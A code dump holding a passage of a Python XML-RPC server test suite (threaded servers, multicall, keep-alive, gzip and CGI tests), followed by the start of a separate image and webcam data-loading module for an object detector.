            return x // y
        def _methodHelp(self, name):
            if name == 'div':
                return 'This is the div function'
    def my_function():
        '''This is my function'''
        return True
    class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
        def get_request(self):
            # Force the accepted socket into blocking mode: the listening
            # socket has a timeout set, and on *BSD and Windows accepted
            # sockets inherit that attribute, while on Linux they do not.
            # (The original comment said "non-blocking", contradicting the code.)
            s, port = self.socket.accept()
            s.setblocking(True)
            return s, port
    if not requestHandler:
        requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
    serv = MyXMLRPCServer(("localhost", 0), requestHandler,
                          logRequests=False, bind_and_activate=False)
    try:
        serv.socket.settimeout(3)
        serv.server_bind()
        global ADDR, PORT, URL
        ADDR, PORT = serv.socket.getsockname()
        # Connect to the IP address directly. This avoids socket.create_connection()
        # trying to connect to "localhost" using all address families, which
        # causes slowdown e.g. on vista which supports AF_INET6. The server listens
        # on AF_INET only.
        URL = "http://%s:%d"%(ADDR, PORT)
        serv.server_activate()
        serv.register_introspection_functions()
        serv.register_multicall_functions()
        serv.register_function(pow)
        serv.register_function(lambda x,y: x+y, 'add')
        serv.register_function(my_function)
        serv.register_instance(TestInstanceClass())
        evt.set()
        # handle up to 'numrequests' requests
        while numrequests > 0:
            serv.handle_request()
            numrequests -= 1
    except socket.timeout:
        pass
    finally:
        serv.socket.close()
        PORT = None
        evt.set()
def http_multi_server(evt, numrequests, requestHandler=None):
    """Like http_server(), but runs a MultiPathXMLRPCServer with separate
    dispatchers mounted at /foo and /foo/bar; sets ADDR/PORT/URL and signals
    evt the same way.
    """
    class TestInstanceClass:
        def div(self, x, y):
            return x // y
        def _methodHelp(self, name):
            if name == 'div':
                return 'This is the div function'
    def my_function():
        '''This is my function'''
        return True
    class MyXMLRPCServer(SimpleXMLRPCServer.MultiPathXMLRPCServer):
        def get_request(self):
            # Force the accepted socket into blocking mode: the listening
            # socket has a timeout set, and on *BSD and Windows accepted
            # sockets inherit that attribute, while on Linux they do not.
            s, port = self.socket.accept()
            s.setblocking(True)
            return s, port
    if not requestHandler:
        requestHandler = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
    class MyRequestHandler(requestHandler):
        # Empty rpc_paths disables path checking so every path reaches the
        # multi-path dispatcher.
        rpc_paths = []
    serv = MyXMLRPCServer(("localhost", 0), MyRequestHandler,
                          logRequests=False, bind_and_activate=False)
    serv.socket.settimeout(3)
    serv.server_bind()
    try:
        global ADDR, PORT, URL
        ADDR, PORT = serv.socket.getsockname()
        # Connect to the IP address directly. This avoids socket.create_connection()
        # trying to connect to "localhost" using all address families, which
        # causes slowdown e.g. on vista which supports AF_INET6. The server listens
        # on AF_INET only.
        URL = "http://%s:%d"%(ADDR, PORT)
        serv.server_activate()
        paths = ["/foo", "/foo/bar"]
        for path in paths:
            d = serv.add_dispatcher(path, SimpleXMLRPCServer.SimpleXMLRPCDispatcher())
            d.register_introspection_functions()
            d.register_multicall_functions()
        serv.get_dispatcher(paths[0]).register_function(pow)
        serv.get_dispatcher(paths[1]).register_function(lambda x,y: x+y, 'add')
        evt.set()
        # handle up to 'numrequests' requests
        while numrequests > 0:
            serv.handle_request()
            numrequests -= 1
    except socket.timeout:
        pass
    finally:
        serv.socket.close()
        PORT = None
        evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
    '''Return True when *e* looks like the server-side 'temporarily
    unavailable' failure that operations on non-blocking sockets
    occasionally produce.'''
    try:
        # A -1 error code or absent headers counts as unavailable outright.
        if e.errcode == -1 or e.headers is None:
            return True
        message = e.headers.get('X-exception')
    except AttributeError:
        # Not a ProtocolError (e.g. a socket.error): fall back to its text.
        message = str(e)
    return bool(message) and 'temporarily unavailable' in message.lower()
@unittest.skipUnless(threading, 'Threading required for this test.')
class BaseServerTestCase(unittest.TestCase):
    # Handler class handed to the server thread; None makes the server
    # function substitute SimpleXMLRPCRequestHandler.
    requestHandler = None
    # How many requests the background server answers before exiting.
    request_count = 1
    # Server entry point run in the background thread; subclasses override
    # this (e.g. with http_multi_server) to exercise other server flavours.
    threadFunc = staticmethod(http_server)

    def setUp(self):
        """Start the limited-request XML-RPC server in a background thread."""
        # enable traceback reporting
        SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
        self.evt = threading.Event()
        # start server thread to handle requests
        serv_args = (self.evt, self.request_count, self.requestHandler)
        threading.Thread(target=self.threadFunc, args=serv_args).start()
        # wait for the server to be ready (the server sets the event
        # once it is bound and registered)
        self.evt.wait(10)
        # clear the event so tearDown can wait on it again for shutdown
        self.evt.clear()

    def tearDown(self):
        # wait on the server thread to terminate (it sets the event again
        # after closing its socket)
        self.evt.wait(10)
        # disable traceback reporting
        SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(BaseServerTestCase):
    """End-to-end tests against the background SimpleXMLRPCServer.

    Every call to the server is wrapped so 'temporarily unavailable'
    failures (see is_unavailable_exception) are ignored rather than
    reported.  All handlers use the ``except ... as e`` spelling (valid
    since Python 2.6) instead of the legacy ``except ..., e`` form,
    matching test_nonascii() below.
    """

    def test_simple1(self):
        try:
            p = xmlrpclib.ServerProxy(URL)
            self.assertEqual(p.pow(6, 8), 6**8)
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket 'unavailable' errors
            if not is_unavailable_exception(e):
                # protocol error; provide additional information in test output
                self.fail("%s\n%s" % (e, getattr(e, "headers", "")))

    def test_nonascii(self):
        start_string = 'P\N{LATIN SMALL LETTER Y WITH CIRCUMFLEX}t'
        end_string = 'h\N{LATIN SMALL LETTER O WITH HORN}n'
        try:
            p = xmlrpclib.ServerProxy(URL)
            self.assertEqual(p.add(start_string, end_string),
                             start_string + end_string)
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket unavailable errors.
            if not is_unavailable_exception(e):
                # protocol error; provide additional information in test output
                self.fail("%s\n%s" % (e, getattr(e, "headers", "")))

    # [ch] The test 404 is causing lots of false alarms.
    def XXXtest_404(self):
        # send POST with httplib, it should return 404 header and
        # 'Not Found' message.
        conn = httplib.HTTPConnection(ADDR, PORT)
        conn.request('POST', '/this-is-not-valid')
        response = conn.getresponse()
        conn.close()
        self.assertEqual(response.status, 404)
        self.assertEqual(response.reason, 'Not Found')

    def test_introspection1(self):
        try:
            p = xmlrpclib.ServerProxy(URL)
            meth = p.system.listMethods()
            expected_methods = set(['pow', 'div', 'my_function', 'add',
                                    'system.listMethods', 'system.methodHelp',
                                    'system.methodSignature', 'system.multicall'])
            self.assertEqual(set(meth), expected_methods)
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket 'unavailable' errors
            if not is_unavailable_exception(e):
                # protocol error; provide additional information in test output
                self.fail("%s\n%s" % (e, getattr(e, "headers", "")))

    def test_introspection2(self):
        try:
            # test _methodHelp()
            p = xmlrpclib.ServerProxy(URL)
            divhelp = p.system.methodHelp('div')
            self.assertEqual(divhelp, 'This is the div function')
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket 'unavailable' errors
            if not is_unavailable_exception(e):
                # protocol error; provide additional information in test output
                self.fail("%s\n%s" % (e, getattr(e, "headers", "")))

    @unittest.skipIf(sys.flags.optimize >= 2,
                     "Docstrings are omitted with -O2 and above")
    def test_introspection3(self):
        try:
            # test native doc
            p = xmlrpclib.ServerProxy(URL)
            myfunction = p.system.methodHelp('my_function')
            self.assertEqual(myfunction, 'This is my function')
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket 'unavailable' errors
            if not is_unavailable_exception(e):
                # protocol error; provide additional information in test output
                self.fail("%s\n%s" % (e, getattr(e, "headers", "")))

    def test_introspection4(self):
        # the SimpleXMLRPCServer doesn't support signatures, but
        # at least check that we can try making the call
        try:
            p = xmlrpclib.ServerProxy(URL)
            divsig = p.system.methodSignature('div')
            self.assertEqual(divsig, 'signatures not supported')
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket 'unavailable' errors
            if not is_unavailable_exception(e):
                # protocol error; provide additional information in test output
                self.fail("%s\n%s" % (e, getattr(e, "headers", "")))

    def test_multicall(self):
        try:
            p = xmlrpclib.ServerProxy(URL)
            multicall = xmlrpclib.MultiCall(p)
            multicall.add(2, 3)
            multicall.pow(6, 8)
            multicall.div(127, 42)
            add_result, pow_result, div_result = multicall()
            self.assertEqual(add_result, 2 + 3)
            self.assertEqual(pow_result, 6**8)
            self.assertEqual(div_result, 127 // 42)
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket 'unavailable' errors
            if not is_unavailable_exception(e):
                # protocol error; provide additional information in test output
                self.fail("%s\n%s" % (e, getattr(e, "headers", "")))

    def test_non_existing_multicall(self):
        try:
            p = xmlrpclib.ServerProxy(URL)
            multicall = xmlrpclib.MultiCall(p)
            multicall.this_is_not_exists()
            result = multicall()
            # result.results contains;
            # [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
            #   'method "this_is_not_exists" is not supported'>}]
            self.assertEqual(result.results[0]['faultCode'], 1)
            self.assertEqual(result.results[0]['faultString'],
                             '<type \'exceptions.Exception\'>:method "this_is_not_exists" '
                             'is not supported')
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket 'unavailable' errors
            if not is_unavailable_exception(e):
                # protocol error; provide additional information in test output
                self.fail("%s\n%s" % (e, getattr(e, "headers", "")))

    def test_dotted_attribute(self):
        # Raises an AttributeError because private methods are not allowed.
        self.assertRaises(AttributeError,
                          SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
        self.assertTrue(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
        # Get the test to run faster by sending a request with test_simple1.
        # This avoids waiting for the socket timeout.
        self.test_simple1()
class MultiPathServerTestCase(BaseServerTestCase):
    """Checks that each dispatcher path exposes only its own functions."""
    threadFunc = staticmethod(http_multi_server)
    request_count = 2

    def test_path1(self):
        # /foo registered pow() but not add()
        proxy = xmlrpclib.ServerProxy(URL + "/foo")
        self.assertEqual(proxy.pow(6, 8), 6 ** 8)
        self.assertRaises(xmlrpclib.Fault, proxy.add, 6, 8)

    def test_path2(self):
        # /foo/bar registered add() but not pow()
        proxy = xmlrpclib.ServerProxy(URL + "/foo/bar")
        self.assertEqual(proxy.add(6, 8), 6 + 8)
        self.assertRaises(xmlrpclib.Fault, proxy.pow, 6, 8)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class BaseKeepaliveServerTestCase(BaseServerTestCase):
    #a request handler that supports keep-alive and logs requests into a
    #class variable
    class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
        parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
        protocol_version = 'HTTP/1.1'
        # One inner list per connection; each inner list collects the raw
        # request lines served over that connection.
        myRequests = []

        def handle(self):
            # Called once per connection: open a fresh per-connection log
            # and remember its index for handle_one_request below.
            self.myRequests.append([])
            self.reqidx = len(self.myRequests)-1
            return self.parentClass.handle(self)

        def handle_one_request(self):
            # Called once per request on the connection: record the request
            # line under the connection slot opened in handle().
            result = self.parentClass.handle_one_request(self)
            self.myRequests[self.reqidx].append(self.raw_requestline)
            return result

    requestHandler = RequestHandler

    def setUp(self):
        #clear request log
        self.RequestHandler.myRequests = []
        return BaseServerTestCase.setUp(self)
#A test case that verifies that a server using the HTTP/1.1 keep-alive mechanism
#does indeed serve subsequent requests on the same connection
class KeepaliveServerTestCase1(BaseKeepaliveServerTestCase):
    def test_two(self):
        """Three keep-alive calls should all go through one connection."""
        p = xmlrpclib.ServerProxy(URL)
        #do three requests.
        self.assertEqual(p.pow(6,8), 6**8)
        self.assertEqual(p.pow(6,8), 6**8)
        self.assertEqual(p.pow(6,8), 6**8)
        #they should have all been handled by a single request handler
        self.assertEqual(len(self.RequestHandler.myRequests), 1)
        #check that we did at least two (the third may be pending append
        #due to thread scheduling)
        self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
#test special attribute access on the serverproxy, through the __call__
#function.
class KeepaliveServerTestCase2(BaseKeepaliveServerTestCase):
    #ask for two keepalive requests to be handled.
    request_count=2

    def test_close(self):
        """p('close')() should force a second connection for later calls."""
        p = xmlrpclib.ServerProxy(URL)
        #do some requests with close.
        self.assertEqual(p.pow(6,8), 6**8)
        self.assertEqual(p.pow(6,8), 6**8)
        self.assertEqual(p.pow(6,8), 6**8)
        p("close")() #this should trigger a new keep-alive request
        self.assertEqual(p.pow(6,8), 6**8)
        self.assertEqual(p.pow(6,8), 6**8)
        self.assertEqual(p.pow(6,8), 6**8)
        #they should have all been two request handlers, each having logged at least
        #two complete requests
        self.assertEqual(len(self.RequestHandler.myRequests), 2)
        self.assertGreaterEqual(len(self.RequestHandler.myRequests[-1]), 2)
        self.assertGreaterEqual(len(self.RequestHandler.myRequests[-2]), 2)

    def test_transport(self):
        """Closing the transport directly has the same effect as 'close'."""
        p = xmlrpclib.ServerProxy(URL)
        #do some requests with close.
        self.assertEqual(p.pow(6,8), 6**8)
        p("transport").close() #same as above, really.
        self.assertEqual(p.pow(6,8), 6**8)
        self.assertEqual(len(self.RequestHandler.myRequests), 2)
#A test case that verifies that gzip encoding works in both directions
#(for a request and the response)
class GzipServerTestCase(BaseServerTestCase):
    """Verifies gzip content-encoding of XML-RPC requests and responses."""
    #a request handler that supports keep-alive and logs requests into a
    #class variable
    class RequestHandler(SimpleXMLRPCServer.SimpleXMLRPCRequestHandler):
        parentClass = SimpleXMLRPCServer.SimpleXMLRPCRequestHandler
        protocol_version = 'HTTP/1.1'

        def do_POST(self):
            #store content of last request in class
            self.__class__.content_length = int(self.headers["content-length"])
            return self.parentClass.do_POST(self)
    requestHandler = RequestHandler

    class Transport(xmlrpclib.Transport):
        #custom transport, stores the response length for our perusal
        fake_gzip = False

        def parse_response(self, response):
            self.response_length = int(response.getheader("content-length", 0))
            return xmlrpclib.Transport.parse_response(self, response)

        def send_content(self, connection, body):
            if self.fake_gzip:
                #add a lone gzip header to induce decode error remotely
                connection.putheader("Content-Encoding", "gzip")
            return xmlrpclib.Transport.send_content(self, connection, body)

    def setUp(self):
        BaseServerTestCase.setUp(self)

    def test_gzip_request(self):
        # An encoded request body must be smaller than the identical
        # unencoded one.
        t = self.Transport()
        t.encode_threshold = None
        p = xmlrpclib.ServerProxy(URL, transport=t)
        self.assertEqual(p.pow(6, 8), 6**8)
        a = self.RequestHandler.content_length
        t.encode_threshold = 0  #turn on request encoding
        self.assertEqual(p.pow(6, 8), 6**8)
        b = self.RequestHandler.content_length
        self.assertTrue(a > b)

    def test_bad_gzip_request(self):
        # A gzip header without gzipped content must produce a 400 error.
        t = self.Transport()
        t.encode_threshold = None
        t.fake_gzip = True
        p = xmlrpclib.ServerProxy(URL, transport=t)
        cm = self.assertRaisesRegexp(xmlrpclib.ProtocolError,
                                     re.compile(r"\b400\b"))
        with cm:
            p.pow(6, 8)

    def test_gzip_response(self):
        # Renamed from the misspelled 'test_gsip_response' (it still ran
        # under the 'test' prefix, but the typo made it hard to locate).
        t = self.Transport()
        p = xmlrpclib.ServerProxy(URL, transport=t)
        old = self.requestHandler.encode_threshold
        self.requestHandler.encode_threshold = None  #no encoding
        self.assertEqual(p.pow(6, 8), 6**8)
        a = t.response_length
        self.requestHandler.encode_threshold = 0  #always encode
        self.assertEqual(p.pow(6, 8), 6**8)
        b = t.response_length
        self.requestHandler.encode_threshold = old
        self.assertTrue(a > b)
#Test special attributes of the ServerProxy object
class ServerProxyTestCase(unittest.TestCase):
    """Exercises the magic proxy('close') / proxy('transport') accessors."""

    def setUp(self):
        unittest.TestCase.setUp(self)
        # Without threading, http_server() and http_multi_server() never ran
        # and URL is still None; 'http://' is just enough for ServerProxy to
        # pick the HTTP scheme without contacting anything.
        self.url = URL if threading else 'http://'

    def test_close(self):
        proxy = xmlrpclib.ServerProxy(self.url)
        self.assertEqual(proxy('close')(), None)

    def test_transport(self):
        transport = xmlrpclib.Transport()
        proxy = xmlrpclib.ServerProxy(self.url, transport=transport)
        self.assertEqual(proxy('transport'), transport)
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
    """Message class whose Content-Length header is deliberately broken."""

    def __getitem__(self, key):
        key = key.lower()
        # Poison only the content-length header; everything else behaves
        # exactly like a normal mimetools.Message.
        return ('I am broken' if key == 'content-length'
                else mimetools.Message.__getitem__(self, key))
@unittest.skipUnless(threading, 'Threading required for this test.')
class FailingServerTestCase(unittest.TestCase):
    """Checks the server's X-exception/X-traceback headers on failure.

    Failures are provoked by installing FailingMessageClass, whose broken
    content-length makes the request handler blow up server side.  Legacy
    ``except ..., e`` handlers were converted to ``except ... as e``
    (valid since Python 2.6).
    """

    def setUp(self):
        self.evt = threading.Event()
        # start server thread to handle requests
        serv_args = (self.evt, 1)
        threading.Thread(target=http_server, args=serv_args).start()
        # wait for the server to be ready
        self.evt.wait()
        self.evt.clear()

    def tearDown(self):
        # wait on the server thread to terminate
        self.evt.wait()
        # reset flag
        SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
        # reset message class
        SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message

    def test_basic(self):
        # check that flag is false by default
        flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
        self.assertEqual(flagval, False)
        # enable traceback reporting
        SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
        # test a call that shouldn't fail just as a smoke test
        try:
            p = xmlrpclib.ServerProxy(URL)
            self.assertEqual(p.pow(6, 8), 6**8)
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket 'unavailable' errors
            if not is_unavailable_exception(e):
                # protocol error; provide additional information in test output
                self.fail("%s\n%s" % (e, getattr(e, "headers", "")))

    def test_fail_no_info(self):
        # use the broken message class
        SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
        try:
            p = xmlrpclib.ServerProxy(URL)
            p.pow(6, 8)
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket 'unavailable' errors
            if not is_unavailable_exception(e) and hasattr(e, "headers"):
                # The two server-side error headers shouldn't be sent back in this case
                self.assertTrue(e.headers.get("X-exception") is None)
                self.assertTrue(e.headers.get("X-traceback") is None)
        else:
            self.fail('ProtocolError not raised')

    def test_fail_with_info(self):
        # use the broken message class
        SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
        # Check that errors in the server send back exception/traceback
        # info when flag is set
        SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
        try:
            p = xmlrpclib.ServerProxy(URL)
            p.pow(6, 8)
        except (xmlrpclib.ProtocolError, socket.error) as e:
            # ignore failures due to non-blocking socket 'unavailable' errors
            if not is_unavailable_exception(e) and hasattr(e, "headers"):
                # We should get error info in the response
                expected_err = "invalid literal for int() with base 10: 'I am broken'"
                self.assertEqual(e.headers.get("x-exception"), expected_err)
                self.assertTrue(e.headers.get("x-traceback") is not None)
        else:
            self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
    """Tests CGIXMLRPCRequestHandler's GET rejection and POST dispatch."""

    def setUp(self):
        self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()

    def tearDown(self):
        self.cgi = None

    def test_cgi_get(self):
        with test_support.EnvironmentVarGuard() as env:
            env['REQUEST_METHOD'] = 'GET'
            # if the method is GET and no request_text is given, it runs handle_get
            # get sysout output
            with test_support.captured_stdout() as data_out:
                self.cgi.handle_request()
            # parse Status header
            data_out.seek(0)
            handle = data_out.read()
            status = handle.split()[1]
            message = ' '.join(handle.split()[2:4])
            self.assertEqual(status, '400')
            self.assertEqual(message, 'Bad Request')

    def test_cgi_xmlrpc_response(self):
        data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
        with test_support.EnvironmentVarGuard() as env, \
             test_support.captured_stdout() as data_out, \
             test_support.captured_stdin() as data_in:
            data_in.write(data)
            data_in.seek(0)
            env['CONTENT_LENGTH'] = str(len(data))
            self.cgi.handle_request()
        data_out.seek(0)
        # will respond exception, if so, our goal is achieved ;)
        handle = data_out.read()
        # start with 44th char so as not to get http header, we just need only xml
        self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
        # Also test the content-length returned by handle_request
        # Using the same test method inorder to avoid all the datapassing
        # boilerplate code.
        # Test for bug: http://bugs.python.org/issue5040
        content = handle[handle.find("<?xml"):]
        # assertEqual (not the deprecated assertEquals alias); raw string so
        # \d is an explicit regex escape rather than a plain-string one.
        self.assertEqual(
            int(re.search(r'Content-Length: (\d+)', handle).group(1)),
            len(content))
class FakeSocket:
    """Socket stand-in that records everything written to it.

    send()/sendall() append to an in-memory buffer, retrievable via
    getvalue().  makefile() raises RuntimeError so the surrounding
    request machinery aborts right after the request bytes were captured.
    """

    def __init__(self):
        # In-memory sink for everything "sent" over this fake socket.
        self.data = StringIO.StringIO()

    def send(self, buf):
        self.data.write(buf)
        # Report the whole buffer as sent, like a fully-drained socket.
        return len(buf)

    def sendall(self, buf):
        self.data.write(buf)

    def getvalue(self):
        # Everything sent so far, as a single string.
        return self.data.getvalue()

    def makefile(self, x='r', y=-1):
        # Abort here: this fake never produces a response to read.
        raise RuntimeError

    def close(self):
        pass
class FakeTransport(xmlrpclib.Transport):
    """A Transport instance that records instead of sending a request.

    The connection's real socket is swapped for a FakeSocket that records
    the outgoing request; no response is ever produced.
    """

    def make_connection(self, host):
        connection = xmlrpclib.Transport.make_connection(self, host)
        # Keep a handle on the recorder so tests can read the request back.
        self.fake_socket = FakeSocket()
        connection.sock = self.fake_socket
        return connection
class TransportSubclassTestCase(unittest.TestCase):
    """Checks that each Transport hook can inject extra request headers."""

    def issue_request(self, transport_class):
        """Return the raw HTTP request an instance of *transport_class* emits."""
        transport = transport_class()
        proxy = xmlrpclib.ServerProxy("http://example.com/",
                                      transport=transport)
        try:
            proxy.pow(6, 8)
        except RuntimeError:
            # FakeSocket.makefile() fired: the full request was recorded.
            return transport.fake_socket.getvalue()
        return None

    def test_custom_user_agent(self):
        class UserAgentTransport(FakeTransport):
            def send_user_agent(self, conn):
                xmlrpclib.Transport.send_user_agent(self, conn)
                conn.putheader("X-Test", "test_custom_user_agent")
        request = self.issue_request(UserAgentTransport)
        self.assertIn("X-Test: test_custom_user_agent\r\n", request)

    def test_send_host(self):
        class HostTransport(FakeTransport):
            def send_host(self, conn, host):
                xmlrpclib.Transport.send_host(self, conn, host)
                conn.putheader("X-Test", "test_send_host")
        request = self.issue_request(HostTransport)
        self.assertIn("X-Test: test_send_host\r\n", request)

    def test_send_request(self):
        class RequestTransport(FakeTransport):
            def send_request(self, conn, url, body):
                xmlrpclib.Transport.send_request(self, conn, url, body)
                conn.putheader("X-Test", "test_send_request")
        request = self.issue_request(RequestTransport)
        self.assertIn("X-Test: test_send_request\r\n", request)

    def test_send_content(self):
        class ContentTransport(FakeTransport):
            def send_content(self, conn, body):
                # Header must go out before the body is written.
                conn.putheader("X-Test", "test_send_content")
                xmlrpclib.Transport.send_content(self, conn, body)
        request = self.issue_request(ContentTransport)
        self.assertIn("X-Test: test_send_content\r\n", request)
@test_support.reap_threads
def test_main():
    """Collect all XML-RPC test cases (in the original order) and run them."""
    xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
                    BinaryTestCase, FaultTestCase, TransportSubclassTestCase,
                    SimpleServerTestCase, KeepaliveServerTestCase1,
                    KeepaliveServerTestCase2]
    try:
        import gzip
        xmlrpc_tests.append(GzipServerTestCase)
    except ImportError:
        pass  # gzip not supported in this build
    xmlrpc_tests.extend([MultiPathServerTestCase, ServerProxyTestCase,
                         FailingServerTestCase, CGIHandlerTestCase])
    test_support.run_unittest(*xmlrpc_tests)
if __name__ == "__main__":
    # Allow running this test file directly.
    test_main()
|
datasets.py | import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
# Accepted file extensions (compared lowercase, including the leading dot).
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif']
vid_formats = ['.mov', '.avi', '.mp4']

# Get orientation exif tag: after this loop `orientation` holds the numeric
# EXIF tag id whose name is 'Orientation'.  NOTE(review): if no such tag
# existed, the loop would finish without break and leave `orientation`
# bound to the last tag id — in practice PIL always defines 'Orientation'.
for orientation in ExifTags.TAGS.keys():
    if ExifTags.TAGS[orientation] == 'Orientation':
        break
def exif_size(img):
    """Return the EXIF-rotation-corrected (width, height) of a PIL image.

    Portrait photos often store landscape pixels plus an EXIF orientation
    flag; for flags 6 and 8 (the 270/90 degree rotations) the reported
    size must be transposed.
    """
    s = img.size  # (width, height)
    try:
        rotation = dict(img._getexif().items())[orientation]
        if rotation in (6, 8):  # rotation 270 or 90: swap width/height
            s = (s[1], s[0])
    except Exception:
        # No EXIF data (_getexif() missing or returning None) or no
        # orientation tag: keep the raw size.  A bare `except:` here would
        # also swallow KeyboardInterrupt/SystemExit, so catch Exception.
        pass
    return s
class LoadImages:  # for inference
    """Iterate over a directory (or single file) of images and videos.

    Each iteration yields (path, letterboxed CHW RGB float image,
    original BGR image, cap) where `cap` is the cv2.VideoCapture for
    video frames and None for still images.
    """

    def __init__(self, path, img_size=416, half=False):
        path = str(Path(path))  # os-agnostic
        files = []
        if os.path.isdir(path):
            files = sorted(glob.glob(os.path.join(path, '*.*')))
        elif os.path.isfile(path):
            files = [path]

        # Split candidates by extension; ordering keeps images first.
        images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
        videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
        nI, nV = len(images), len(videos)

        self.img_size = img_size
        self.files = images + videos
        self.nF = nI + nV  # number of files
        # Parallel flags marking which entries of self.files are videos.
        self.video_flag = [False] * nI + [True] * nV
        self.mode = 'images'
        self.half = half  # half precision fp16 images
        if any(videos):
            self.new_video(videos[0])  # new video
        else:
            self.cap = None
        assert self.nF > 0, 'No images or videos found in ' + path

    def __iter__(self):
        # Reset iteration cursor.
        self.count = 0
        return self

    def __next__(self):
        if self.count == self.nF:
            raise StopIteration
        path = self.files[self.count]

        if self.video_flag[self.count]:
            # Read video
            self.mode = 'video'
            ret_val, img0 = self.cap.read()
            if not ret_val:
                # Current video exhausted: move on to the next file.
                self.count += 1
                self.cap.release()
                if self.count == self.nF:  # last video
                    raise StopIteration
                else:
                    path = self.files[self.count]
                    self.new_video(path)
                    ret_val, img0 = self.cap.read()

            self.frame += 1
            print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')

        else:
            # Read image
            self.count += 1
            img0 = cv2.imread(path)  # BGR
            assert img0 is not None, 'Image Not Found ' + path
            print('image %g/%g %s: ' % (self.count, self.nF, path), end='')

        # Padded resize
        img, *_ = letterbox(img0, new_shape=self.img_size)

        # Normalize RGB
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB
        img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32)  # uint8 to fp16/fp32
        img /= 255.0  # 0 - 255 to 0.0 - 1.0

        # cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1])  # save letterbox image
        return path, img, img0, self.cap

    def new_video(self, path):
        # Open `path` and reset the per-video frame counter.
        self.frame = 0
        self.cap = cv2.VideoCapture(path)
        self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))

    def __len__(self):
        return self.nF  # number of files
class LoadWebcam:  # for inference
    """Stream frames from a local webcam or a single IP-camera pipe.

    Each iteration yields ('webcam.jpg', letterboxed CHW RGB float image,
    original BGR frame, None); iteration stops when 'q' is pressed.
    """

    def __init__(self, pipe=0, img_size=416, half=False):
        self.img_size = img_size
        self.half = half  # half precision fp16 images

        if pipe == '0':
            pipe = 0  # local camera
        # pipe = 'rtsp://192.168.1.64/1'  # IP camera
        # pipe = 'rtsp://username:password@192.168.1.64/1'  # IP camera with login
        # pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa'  # IP traffic camera
        # pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg'  # IP golf camera

        # https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
        # pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink'  # GStreamer

        # https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
        # https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package  # install help
        # pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink"  # GStreamer

        self.pipe = pipe
